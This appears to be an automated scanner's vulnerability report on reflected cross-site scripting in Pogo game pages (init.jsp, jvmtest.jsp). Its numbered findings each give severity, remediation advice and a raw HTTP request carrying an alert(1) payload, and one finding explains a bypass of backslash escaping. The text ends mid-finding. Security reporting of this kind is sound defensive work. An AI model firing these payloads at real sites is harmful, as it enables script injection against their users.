GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=36ecf"><script>alert(1)</script>379a9cf2e56 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
3.498. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://game3.pogo.com
Path:
/room/loading/init.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea62</script><script>alert(1)</script>3760e1d6c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/init.jsp?8ea62</script><script>alert(1)</script>3760e1d6c18=1 HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
3.499. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://game3.pogo.com
Path:
/room/loading/init.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc140"><script>alert(1)</script>b2bbcc6ee94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&fc140"><script>alert(1)</script>b2bbcc6ee94=1 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ea8"><script>alert(1)</script>611e5c167b was submitted in the rhst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=38ea8"><script>alert(1)</script>611e5c167b&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa77"><script>alert(1)</script>6d9ec8f62ed was submitted in the rspt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=cfa77"><script>alert(1)</script>6d9ec8f62ed&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fca"><script>alert(1)</script>aa742097ac6 was submitted in the scrn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=b1fca"><script>alert(1)</script>aa742097ac6&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eecd"><script>alert(1)</script>32bc7416dcb was submitted in the ugifts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=1eecd"><script>alert(1)</script>32bc7416dcb&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6724c"><script>alert(1)</script>42c19f207ae was submitted in the ahst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com6724c"><script>alert(1)</script>42c19f207ae&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4401e"><script>alert(1)</script>8b4c56b51c1 was submitted in the anam parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+1024401e"><script>alert(1)</script>8b4c56b51c1&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e635"><script>alert(1)</script>005bf7ed2bc was submitted in the apid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules1e635"><script>alert(1)</script>005bf7ed2bc&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b03"><script>alert(1)</script>8edfae6e7ac was submitted in the auto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow67b03"><script>alert(1)</script>8edfae6e7ac HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
<script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener.location.replace(dest); top.window.close(); } else { top.window. ...[SNIP]... m/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow67b03"><script>alert(1)</script>8edfae6e7ac"> ...[SNIP]...
3.508. http://game3.pogo.com/room/loading/jvmtest.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://game3.pogo.com
Path:
/room/loading/jvmtest.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13d1"><script>alert(1)</script>a7b4af90121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&e13d1"><script>alert(1)</script>a7b4af90121=1 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c459"><script>alert(1)</script>145a3e0d196 was submitted in the rhst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com9c459"><script>alert(1)</script>145a3e0d196&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8e12"><script>alert(1)</script>5e44d514793 was submitted in the rspt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909d8e12"><script>alert(1)</script>5e44d514793&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fd3"><script>alert(1)</script>cca616bfa9d was submitted in the scrn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k724068fd3"><script>alert(1)</script>cca616bfa9d&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c99"><script>alert(1)</script>43258050f9e was submitted in the ugifts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=075c99"><script>alert(1)</script>43258050f9e&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ahst request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb224\'%3balert(1)//91fe0cf4ea7 was submitted in the ahst parameter. This input was echoed as bb224\\';alert(1)//91fe0cf4ea7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
